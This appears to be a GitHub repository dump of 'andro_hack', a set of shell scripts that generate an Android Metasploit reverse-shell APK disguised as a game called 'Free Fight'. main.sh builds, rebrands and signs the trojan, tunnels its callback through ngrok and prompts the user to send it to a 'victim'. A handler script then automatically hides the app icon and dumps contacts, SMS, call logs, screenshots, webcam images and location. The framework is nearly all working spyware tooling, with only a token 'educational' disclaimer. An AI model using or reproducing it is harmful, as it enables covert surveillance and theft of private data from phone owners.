├── .github └── FUNDING.yml ├── README.md ├── andro_get_details.sh ├── drawable └── icon.png ├── ir.wav ├── last.wav ├── location.sh ├── main.sh ├── ngcheck.sh ├── payload1.sh └── setup.sh /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] 4 | patreon: # Replace with a single Patreon username 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: # Replace with a single Liberapay username 10 | issuehunt: # Replace with a single IssueHunt username 11 | otechie: # Replace with a single Otechie username 12 | lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry 13 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] 14 | 15 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # andro_hack 2 | andro_hack is a framework that generate signed apk payload to penetrate android platforms. 3 | 4 | # Legal Disclamer: 5 | 6 | The author does not hold any responsibility for the bad use of this tool, 7 | remember this is only for educational purpose. 8 | 9 | 10 | # Requirements: 11 | 12 | 1.MSFvenom 13 | 14 | https://github.com/g0tmi1k/msfpc 15 | 16 | 2.zipalign 17 | 18 | sudo apt-get install -y zipalign 19 | 20 | 3.apktool 21 | 22 | https://ibotpeaches.github.io/Apktool/ 23 | 24 | 4.jarsigner 25 | 26 | 27 | 5.ngrok (automatically download when you run this framework) 28 | 29 | 30 | # Config/Usage: 31 | 32 | - Extract this zip file in to your Desktop 33 | 34 | - Open a terminal and change the directory to andro_hack 35 | 36 | - Set script execution permission 37 | 38 | cd andro_hack 39 | chmod 777 setup.sh 40 | 41 | - Run andro_hack Framework : 42 | 43 | ./setup.sh 44 | -------------------------------------------------------------------------------- /andro_get_details.sh: -------------------------------------------------------------------------------- 1 | exploit 2 | hide_app_icon 3 | wakelock 4 | cd / 5 | cd sdcard 6 | upload last.wav 7 | upload ir.wav 8 | cd / 9 | sysinfo 10 | check_root 11 | getuid 12 | localtime 13 | pwd 14 | ls -l 15 | app_list 16 | ps 17 | dump_contacts 18 | dump_calllog 19 | dump_sms 20 | screenshot 21 | webcam_list 22 | webcam_snap 23 | ifconfig 24 | ipconfig 25 | portfwd 26 | route 27 | geolocate 28 | play last.wav 29 | play ir.wav 30 | -------------------------------------------------------------------------------- /drawable/icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jithinkc22j/andro_hack/3121ac1c89c4c42e610153159218e59deaa055df/drawable/icon.png -------------------------------------------------------------------------------- /ir.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jithinkc22j/andro_hack/3121ac1c89c4c42e610153159218e59deaa055df/ir.wav -------------------------------------------------------------------------------- /last.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jithinkc22j/andro_hack/3121ac1c89c4c42e610153159218e59deaa055df/last.wav -------------------------------------------------------------------------------- /location.sh: -------------------------------------------------------------------------------- 1 | echo "----------------------------------------------------------------------" 2 | echo " " 3 | echo " -----------------Location FInder termminal--------------------------- " 4 | echo " " 5 | echo "----------------------------------------------------------------------" 6 | echo " " 7 | echo "Note copy the longitude and lattitude and paste here.." 8 | echo " " 9 | read -p " Enter Longit : " lo 10 | echo " " 11 | read -p " Enter lattitude : " lat 12 | echo " " 13 | echo " OPening Google Map location....... " 14 | sleep 0.5 15 | n=www.google.com/maps/place/$lo,$lat 16 | xdg-open https://$n 17 | 18 | -------------------------------------------------------------------------------- /main.sh: -------------------------------------------------------------------------------- 1 | red='\e[1;31m' 2 | yellow='\e[1;33m' 3 | white='\e[1;37m' 4 | Escape="\033"; 5 | RedF="${Escape}[31m"; 6 | green='\e[0;32m' 7 | # cleaning previous apk 8 | #if [( $(ls | grep -w *".apk"))== *".apk"] 9 | #then 10 | rm $(ls | grep -w *".apk"); 11 | gnome-terminal -e "bash -c \" ./ngcheck.sh; exec bash\"" 12 | echo "--------------------------------------------------------------------------------------" 13 | echo " " 14 | echo " --------------------------ngrok public tunnel opend----------------------------------" 15 | echo " " 16 | 17 | echo " Copy the Public host & port Number from ngrok terminal (Forwarding tcp://(this lhost)--> 0.tcp.ngrok.io:55555 <--(this loprt))" 18 | echo " " 19 | echo -e $red "Note: Don't close the ngrok terminal" 20 | echo -e $white " " 21 | read -p "Enter the lhost :" lhost 22 | echo " " 23 | read -p "Enter the lport :" lport 24 | echo " " 25 | read -p "Enter the name of apk you need :" ap 26 | echo " " 27 | echo "--------------------------------------------------------------------------------------" 28 | echo " " 29 | echo " ------------------------Payload Generating section-----------------------------------" 30 | echo " " 31 | i=1 32 | b=2 33 | for i in {1..50}; do 34 | val=`expr $i % $b` 35 | 36 | if [ $val == 0 ] 37 | then 38 | ip='-' 39 | str1="$str1$ip" 40 | printf '\r Generating apk - %s> ' $str1; sleep 0.1; 41 | else 42 | ip='-' 43 | str1="$str1$ip" 44 | printf '\r Generating apk - -%s' $str1; sleep 0.1; 45 | fi 46 | done 47 | s=$(whoami) 48 | echo " " 49 | 50 | msfvenom --arch dalvik --platform android --payload android/meterpreter/reverse_tcp lhost=$lhost lport=$lport /home/$s/Desktop>$ap.apk 51 | #---------------------------------------------------------------------------------------- 52 | echo " " 53 | echo " Payload generated................." 54 | echo " " 55 | sleep 0.5 56 | echo " Decompiling apk.................. " 57 | echo " " 58 | apktool d $ap.apk 59 | echo " " 60 | echo " Creating app icon................." 61 | echo " " 62 | sleep 0.5 63 | cp -r drawable /home/$s/Desktop/andro_hack/$ap/res/ 64 | echo " " 65 | echo " Copying app icon-drawable to main. " 66 | echo " " 67 | cd $ap 68 | sed -i '29d' AndroidManifest.xml 69 | sleep 0.5 70 | echo " Editing AndroidManifest activity... " 71 | echo " " 72 | sed -i '28a' AndroidManifest.xml 73 | sleep 0.5 74 | sed -i '26a' AndroidManifest.xml 75 | sed -i '26a' AndroidManifest.xml 76 | sed -i '26a' AndroidManifest.xml 77 | sed -i '26a' AndroidManifest.xml 78 | sed -i '26a' AndroidManifest.xml 79 | sed -i '26a' AndroidManifest.xml 80 | sed -i '26a' AndroidManifest.xml 81 | sed -i '26a' AndroidManifest.xml 82 | sed -i '26a' AndroidManifest.xml 83 | sleep 0.5 84 | cd res 85 | cd values 86 | sed -i '3d' strings.xml 87 | sed -i '2aFree Fight' strings.xml 88 | cd -- 89 | cd /home/$s/Desktop/andro_hack/ 90 | sleep 0.5 91 | echo " " 92 | echo " App icon created................... " 93 | echo " " 94 | sleep 0.5 95 | echo " Compiling the $ap.apk file........." 96 | apktool b $ap 97 | sleep 0.5 98 | echo " " 99 | echo " Removing existing apk file....... " 100 | rm $ap.apk 101 | sleep 0.5 102 | cd $ap/dist/ 103 | sleep 0.5 104 | cp -r $ap.apk /home/$s/Desktop/andro_hack/ 105 | sleep 0.5 106 | echo " " 107 | echo " Copying $ap.apk to main file.... " 108 | echo " " 109 | cd -- 110 | cd /home/$s/Desktop/andro_hack/ 111 | rm -r $ap 112 | echo " Removing the Decompiled $ap folder" 113 | echo " " 114 | echo " Your application successfully created " 115 | echo " " 116 | sleep 0.5 117 | echo " Your $ap.apk needed signing for (fake) verification" 118 | echo " " 119 | echo " -----------------------------APK signing section-------------------------------------" 120 | echo " " 121 | echo -e $yellow " Asking for App information just fill randomly and remember the password :${red} android" 122 | echo " " 123 | echo -e $white "-------------------------------------------------------------------------------------- " 124 | echo " " 125 | echo " Creating Keystore................." 126 | echo " " 127 | sleep 0.5 128 | echo " " 129 | echo " Executing the Keystore............ " 130 | echo " " 131 | sleep 0.5 132 | keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias my-alias 133 | echo " " 134 | echo " Successfully created keystore....." 135 | echo " " 136 | echo "------------------------------------------------------------------------------------------- " 137 | echo " " 138 | echo " Signing Your application.........." 139 | echo " " 140 | sleep 0.5 141 | echo " Signing the apk using jarsigner.." 142 | echo " " 143 | jarsigner -keystore key.jks -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA $ap.apk my-alias 144 | echo " " 145 | echo " Successfully signed the apk ....." 146 | echo " " 147 | echo " Zipaligning the apk..............." 148 | echo " " 149 | sleep 0.5 150 | zipalign -v 4 $ap.apk new_$ap.apk 151 | mv new_$ap.apk $ap.apk 152 | echo "------------------------------------------------------------------------------------------- " 153 | echo " " 154 | echo " Opening file system..............." 155 | echo " " 156 | sleep 0.5 157 | echo " Send the apk to victim ..........(Note : after installing the apk name will changed to Free Fight.)" 158 | sleep 0.5 159 | rm key.jks 160 | xdg-open /home/$s/Desktop/andro_hack 161 | sleep 0.5 162 | i=1 163 | while [ $i == 1 ] 164 | do 165 | echo " " 166 | read -p " Are you sent the apk [y/n] : " pass 167 | case "$pass" in 168 | "y")echo " " 169 | read -p " Do you want to open exploit now! [y/n] : " pas 170 | case "$pas" in 171 | "y")echo " " 172 | echo " " 173 | echo "------------------------------ Exploit- Listener --------------------------------- " 174 | echo " " 175 | sleep 0.5 176 | echo " Starting Apache2 service............. " 177 | sleep 0.5 178 | sudo service apache2 start 179 | echo " " 180 | sleep 0.5 181 | echo " Starting Postgresql service.......... " 182 | echo " " 183 | sudo service postgresql start 184 | echo " " 185 | sleep 0.5 186 | echo " Opening Msfconsole exploit........... " 187 | echo " " 188 | sleep 0.5 189 | echo "--------------------------------MSFCONSOLE--------------------------------------- " 190 | echo " " 191 | break 192 | ;; 193 | "n") echo " " 194 | echo " Waiting for your confirmation......." 195 | echo " " 196 | sleep 0.5 197 | echo " Send the apk to victm.............." 198 | sleep 0.8 199 | ;; 200 | esac 201 | ;; 202 | "n")echo " " 203 | echo " Waiting for your confirmation........" 204 | echo " " 205 | sleep 0.5 206 | echo " Send the apk to victm................" 207 | echo " " 208 | sleep 0.8 209 | ;; 210 | esac 211 | done 212 | #------------------------------------------------------------------------------------------- 213 | #function listeners 214 | echo " Note:-" 215 | echo " . This will automatically collect all details of victim such as process,files,app list,etc." 216 | echo " . If you need victim files use the command- download 'path to file' " 217 | echo " . copy the longitude and lattitude from lister terminal and paste in location finder terminal" 218 | echo " " 219 | sleep 1 220 | gnome-terminal -e "bash -c \" ./location.sh; exec bash\"" 221 | msfconsole -x -f -r ./payload1.sh 222 | 223 | 224 | 225 | -------------------------------------------------------------------------------- /ngcheck.sh: -------------------------------------------------------------------------------- 1 | echo " Checking ngrok ....... " 2 | s=$(whoami) 3 | echo " " 4 | sleep 0.1 5 | d= find | grep -w "ngrok.yml" 6 | if [ $d = "./.ngrok2/ngrok.yml" ] 7 | then 8 | echo "ngrok found.........." 9 | echo " " 10 | read -p "Enter the full path to ngrok :" pathn 11 | echo " " 12 | cd $pathn 13 | echo " " 14 | read -p "Enter your authentication token :" toke 15 | echo " " 16 | tt= ./ngrok authtoken $toke | grep -w "ERROR" 17 | if [ $tt = "ERROR: You must pass a single argument, the authtoken to save to configuration file." ] 18 | then 19 | echo " " 20 | echo " Token Authentication Failed....... " 21 | echo " " 22 | exit 23 | else 24 | ./ngrok authtoken $toke 25 | echo " " 26 | echo "Authentication successful & opening ngrok terminal " 27 | echo " " 28 | ./ngrok tcp 3389 29 | exit 30 | fi 31 | else 32 | echo " " 33 | echo "ngrok not found........" 34 | echo " " 35 | sleep 0.5 36 | echo " Downloading ngrok ....." 37 | echo " " 38 | sleep 0.5 39 | echo " Register in ngrok - opening ngrok website.." 40 | echo " " 41 | sleep 0.5 42 | xdg-open https://dashboard.ngrok.com/signup 43 | while [ 1==1 ] 44 | do 45 | read -p " Have you completed registration [y/n] :" pp 46 | echo " " 47 | if [ $pp = 'y' ] 48 | then 49 | echo " Opening ngrok downloading page............. " 50 | echo " " 51 | sleep 0.5 52 | xdg-open https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip 53 | echo " " 54 | sleep 0.5 55 | read -p " completed downloading..? [y/n] :" po 56 | echo " " 57 | sleep 0.5 58 | if [ $po = 'y' ] 59 | then 60 | cd /home/$s/Downloads 61 | unzip ngrok-stable-linux-amd64.zip -d ngrok-stable-linux-amd64 62 | sleep 2 63 | cd ngrok-stable-linux-amd64 64 | echo " " 65 | read -p "Enter your authentication token :" toke 66 | echo " " 67 | tt= ./ngrok authtoken $toke | grep -w "ERROR" 68 | echo " " 69 | if [ $tt = 'ERROR: You must pass a single argument, the authtoken to save to configuration file.' ] 70 | then 71 | echo " " 72 | echo " Token Authentication Failed....... " 73 | echo " " 74 | exit 75 | else 76 | ./ngrok authtoken $toke 77 | echo " " 78 | echo "Authentication successful & opening ngrok terminal " 79 | echo " " 80 | sleep 0.5 81 | echo " Opening ngrok terminal " 82 | echo " " 83 | ./ngrok tcp 3389 84 | exit 85 | fi 86 | else 87 | echo " " 88 | echo " Waiting for completing your downloaad " 89 | echo " " 90 | fi 91 | fi 92 | done 93 | fi 94 | -------------------------------------------------------------------------------- /payload1.sh: -------------------------------------------------------------------------------- 1 | use multi/handler 2 | set payload android/meterpreter/reverse_tcp 3 | set lhost 127.0.0.1 4 | set lport 3389 5 | resource andro_get_details.sh 6 | -------------------------------------------------------------------------------- /setup.sh: -------------------------------------------------------------------------------- 1 | chmod 777 main.sh andro_get_details.sh location.sh ngs.sh payload1.sh 2 | ./main.sh 3 | --------------------------------------------------------------------------------